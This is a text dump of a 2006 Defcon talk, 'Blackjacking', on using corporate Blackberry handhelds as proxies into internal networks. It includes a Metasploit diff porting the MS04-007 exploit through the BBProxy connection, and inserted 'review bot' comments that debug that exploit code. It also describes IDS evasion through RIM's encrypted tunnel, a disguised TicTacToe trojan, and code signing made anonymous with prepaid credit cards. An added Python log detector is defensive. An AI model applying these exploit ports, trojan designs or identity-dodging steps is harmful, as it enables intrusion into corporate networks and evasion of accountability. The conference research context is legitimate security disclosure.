Blackjacking: 0wning the Enterprise via Blackberry. Jesse "x30n" D'Aguanno


Blackjacking: 0wning the Enterprise via Blackberry
Jesse "x30n" D'Aguanno
x30n@digrev.org
jesse@praetoriang.net
Defcon 14 - Las Vegas, NV USA 2006

Hello, my name is... $ whois x30n
Founder / Director, Professional Services, Praetorian Global, LLC (http://www.praetoriang.net)
Member / Team Captain, Digital Revelation: security research group and two-time winners of the Defcon CTF (http://www.digrev.org)

Who uses Blackberry?
Who doesn't? It holds the market-share lead for handhelds (Gartner).
"Government workers and emergency personnel would be exempt from a possible shutdown" (Computerworld).

The solution - Background
Diagram sequence (images not recoverable): typical corporate Blackberry installation; outgoing BES-to-RIM connection; persistent tunnel between BES and RIM; persistent tunnel between BES and the BB device; BB device now virtually on the internal network.

The solution - Review
BES / MDS creates an outbound, persistent connection to the RIM network. The Blackberry device is then virtually placed on the internal network (wherever BES / MDS exists): always on, always connected, and independent of the wireless carrier.

Problem with the solution
Attitude toward handhelds: usually only the security of the data on the handheld is considered, not the impact of the handheld on the rest of the network. Blackberries are computers with a constant connection to the corporate LAN, yet they are not treated like other remote access (i.e. VPN / dial-in).

Problem with the solution
Guess what, we can exploit this problem! Enter BBProxy.

Step 1 - External Connection
Create an outbound socket connection from the Blackberry device to an attacker-controlled host on the internet. (diagram)

Step 2 - Secondary Connection
From the attacker-controlled host, we then initiate a subsequent socket connection to a second host, including internal hosts. (diagram)

Step 3 - Proxy connection between external and internal host
The Blackberry then proxies all data between the two hosts. (diagram: Attacker Host on the Internet, Blackberry, App Serv on the Internal LAN; proxy connection from external host to internal host)

BBProxy
Sweet! So now we can directly communicate with any port on an internal host from an external host, right through our little Blackberry handheld.

Demo - Let's check it out
Interaction with an internal service. (demo slide)

BBProxy
OK, cool, we can now telnet to an internal box, or ssh, or even grab intranet sites. But can we do anything cooler? This is Defcon; aren't we going to attack something? OF COURSE!

Metasploit!
Enter Metasploit: Point, Click, Root(TM). Now with Blackberry flavor! C'est impossible!

Metasploit!
A top-level ("listener") function was added to Metasploit to create a listening socket on port 1455 (default). When a connection is received, it verifies the BBProxy handshake. Once connected, the connection is available to any exploit within the framework; the exploit just needs to call it.

Demo - Let's do it
Exploitation of a vulnerable service behind the corporate firewall. (demo slide)

Metasploit! Porting an exploit
It is very easy to plug into usable exploits. Let's walk through one: msasn1_ms04_007_killbill.pm.

Metasploit! Porting an exploit Patch msasn1_ms_04_007_killbill exploit @@ -93,7 +93,8 @@ my $target_idx = $self->getvar('target'); my $target_app = $self->getvar('proto'); my $shellcode = $self->getvar('encodedpayload')->payload; - my $target = $self->targets->[$target_idx]; + my $target = $self->targets->[$target_idx]; + my $s = $self->getvar('proxyconn'); Here we set $s to the value of the global variable PROXYCONN (Our proxy connection) Defcon 14 - Las Vegas, NV USA 2006 27

Metasploit! Porting an exploit Patch msasn1_ms_04_007_killbill exploit $self->printline("[*] Attempting to exploit target ". $target->[0]); @@ -124,17 +125,34 @@ "\x08\x00\xeb\xfe"; my $token = SPNEGO::token($stage0, $shellcode); - my $sock = Msf::Socket::Tcp->new - ( - 'PeerAddr' => $target_host, - 'PeerPort' => $target_port, - 'SSL' => $self->getvar('ssl'), - ); - - if ($sock->iserror) { - $self->printline("[*] Could not connect: ".$sock->geterror()); - return; - } We remove the standard socket build stuff Defcon 14 - Las Vegas, NV USA 2006 28

Metasploit! Porting an exploit + if (!$s) { + my $s = Msf::Socket::Tcp->new + ( + 'PeerAddr' => $target_host, + 'PeerPort' => $target_port, + 'SSL' => $self->getvar('ssl'), + ); + + if ($s->iserror) { + $self->printline('[*] Error creating socket: '. $s- >GetError); + return; + } + } else { + $s = $s; + } And only do it if PROXYCONN wasn t set Defcon 14 - Las Vegas, NV USA 2006 29

Metasploit! Porting an exploit + + my $sock = $s; + $sock- >Send($target_host.":".$target_port."\n"); Otherwise use our previous proxy connection and send the appropriate string to start the subsequent connection Defcon 14 - Las Vegas, NV USA 2006 30

Metasploit! Porting an exploit + sleep(2); + print $sock->recv(); + sleep(2); + Sleep a bit to allow the second connection to be established, then do it! if ($target_app eq 'http') { return $self->exploitiis($sock, $token); @@ -176,7 +194,7 @@ if ($resp =~ /0x80090304/) { $self->printline("[*] Server responded with error code 0x80090304"); } - + sleep(10); $self->handler($sock); $sock->close; return; Defcon 14 - Las Vegas, NV USA 2006 31
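Review bot: in the first hunk (@@ -93,7 +93,8 @@), the added `my $s = $self->getvar('proxyconn');` pulls in a variable that nothing in the module documents; a one-line comment stating that PROXYCONN is populated by the BBProxy listener and that an unset value means "connect directly" would save the next reader from guessing, and a more descriptive name than `$s` (for example `$proxy`) would make the later branches self-explanatory.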
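Review bot: in the second hunk (@@ -124,17 +125,34 @@), `my $s = Msf::Socket::Tcp->new` inside `if (!$s) {` declares a new block-scoped lexical that shadows the outer `$s`, so on the non-proxy path the freshly built socket is discarded at the closing brace and `my $sock = $s;` receives undef; drop the `my` so the assignment targets the outer variable, and delete the `} else { $s = $s; }` branch, which is a no-op. The following `$sock->Send($target_host.":".$target_port."\n");` runs on both paths, so in the direct case the host:port line is sent to the real target ahead of the exploit payload; it should sit under the same condition that selects the proxy socket. Two smaller points: the error branch calls `$s->GetError` where the removed code called `geterror()` (Perl method names are case-sensitive), and `print $sock->recv();` displays the proxy's reply but never checks it, so a failed second connection is not detected before the exploit proceeds.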
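Review bot: in the third hunk (@@ -176,7 +194,7 @@), the bare `sleep(10);` inserted before `$self->handler($sock);` is an unexplained fixed delay, as are the two `sleep(2);` calls around the proxy hand-off earlier in the patch; a comment stating what each delay waits for (the proxied second connection, then the payload coming up over it) and an option for the value would make the timing tunable instead of hard-coded.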

Metasploit - Current Limitations
Use with the current BBProxy is limited to TCP-based exploits (it won't require much to allow UDP). Exploitation is reliable over vanilla TCP connections; problems were encountered with some RPC and special-protocol exploits. Plan to rework to remove these limitations.

IDS evasion goodness
Each newer device has an onboard TCP/IP stack, so there is no need for MDS to make the connection. Choosing the connection type in code is simple: deviceside=true or deviceside=false in the connection string. The first connection is made from the device side (direct from the carrier network); the second connection goes through MDS. Nothing on the border can see our traffic (it's all encrypted inside RIM's tunnel).

IDS evasion goodness (diagrams)
First connection: from the Blackberry over the wireless provider's carrier network, across the Internet, to the attacker-controlled box. Subsequent diagram slides are not recoverable. "Just like"
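Since the second hop rides RIM's encrypted tunnel, the border IDS sees nothing; the plaintext of the internal connections exists only at the MDS. As an added example (my code, not the talk's and not RIM's), here is a detector over a constructed MDS-style connection log that flags a single handheld PIN fanning out to many internal host:port pairs, the pattern the Step 1-3 proxying above would leave behind, and connections to internal ports outside an allow-list; the log layout, the 10.0.0.0/8 range and the allow-list are assumptions.

```python
# Added detection example (not from the talk, not RIM/BES code); the log layout
# below is CONSTRUCTED for this example and is not the real MDS log format.
import ipaddress
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed MDS-style connection log: timestamp, handheld PIN, destination.
SAMPLE_LOG = """\
2006-08-04T10:00:01 pin=2100ABCD dst=10.1.5.20:443
2006-08-04T10:00:05 pin=2100ABCD dst=10.1.5.21:22
2006-08-04T10:00:06 pin=2100ABCD dst=10.1.5.22:23
2006-08-04T10:00:07 pin=2100ABCD dst=10.1.5.23:139
2006-08-04T10:00:08 pin=2100ABCD dst=10.1.5.24:445
2006-08-04T10:00:09 pin=2100ABCD dst=10.1.5.25:1433
2006-08-04T10:05:00 pin=2100EF01 dst=10.1.5.20:443
"""
LINE = re.compile(r"(\S+) pin=(\w+) dst=(\S+):(\d+)")
INTERNAL = ipaddress.ip_network("10.0.0.0/8")  # assumed corporate range
ALLOWED_PORTS = {80, 443}  # what a handheld legitimately reaches via MDS

def parse(text):
    for m in LINE.finditer(text):
        ts, pin, host, port = m.groups()
        yield datetime.fromisoformat(ts), pin, host, int(port)

def find_fanout(text, window=timedelta(minutes=1), threshold=5):
    """PINs that reach >= threshold distinct internal host:port pairs inside
    any `window`: one handheld should not behave like a port scanner."""
    events = defaultdict(list)
    for ts, pin, host, port in parse(text):
        if ipaddress.ip_address(host) in INTERNAL:
            events[pin].append((ts, f"{host}:{port}"))
    flagged = {}
    for pin, evs in events.items():
        evs.sort()
        for i, (t0, _) in enumerate(evs):
            seen = {ep for t, ep in evs[i:] if t - t0 <= window}
            if len(seen) >= threshold:
                flagged[pin] = seen
                break
    return flagged

def find_disallowed_ports(text):
    """Internal endpoints outside the allow-list, per PIN (policy check)."""
    hits = defaultdict(set)
    for _, pin, host, port in parse(text):
        if ipaddress.ip_address(host) in INTERNAL and port not in ALLOWED_PORTS:
            hits[pin].add(f"{host}:{port}")
    return dict(hits)
```

On the sample, PIN 2100ABCD is reported by both checks while 2100EF01 (two hits on 10.1.5.20:443) is not, which is the distinction an MDS-side rule needs to make.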

Else
Problem: BBProxy requires control of the device (an interactive app).
Solution: the first and only Blackberry trojan (that I know of)!

Trojan: Hot Game 2006
Same functionality as BBProxy; the user only sees the game interface (TicTacToe). Over-the-air download! Easily integrated with other network discovery functions and more covert methods of control (IRC, etc.).

Demo - Let's do it
Exploitation of a vulnerable service behind the corporate firewall while the user plays TicTacToe.

Code Signatures
RIM requires code (.cod) to be signed with a RIM-assigned private key in order to use proprietary APIs, network access without confirmation, etc. A $100 USD processing fee is charged to verify the identity of the signature requestor; the credit card name and address are used for the ID verification.

Code Signatures
Prepaid credit cards! Prepaid CCs allow online transactions by ignoring the name and address fields. No need to steal a credit card number; they are widely available in mini-markets and grocery stores everywhere. Works!

Review
We can talk to hosts behind the corporate firewall. We can attack them. We can subvert IDS or data logging. We can do it in a trojan. We can sign our trojan anonymously and use all APIs. It gets worse! (or maybe better...)

Device Provisioning
Ease of use vs. security is always a fight, and ease of use wins! Adding a new device is extremely easy: just plug it in, and the new device is then provisioned for use on the BES.

Blackjacking - Hijacking the Blackberry connection
BB devices are identified by their unique PIN. A Blackberry user plugs a new device into the PC; the new PIN is recognized, and encryption keys are generated and stored on the BB handheld. The device PIN and the new key are pushed to Exchange via MAPI, and the info is stored in the BlackberryHandheldInfo folder in the user's mailbox. The new device is now routing through MDS. This can be automated!

Work in progress: a trojan to automate the BB hijack process; utilizing other delivery mechanisms; everything else. Check www.praetoriang.net or www.digrev.org for updates.

References
Code and updated slides can be found at http://www.praetoriang.net/presentations/blackjack or http://www.digrev.org/blackjack. The final slides will have references to RIM security documentation.

Q&A?

Thanks / Greetings
Digital Revelation (DigRev), Pablo_marx, FX, Ian Robertson (RIM)

Thank You For Coming!
Jesse "x30n" D'Aguanno
jesse@praetoriang.net
x30n@digrev.org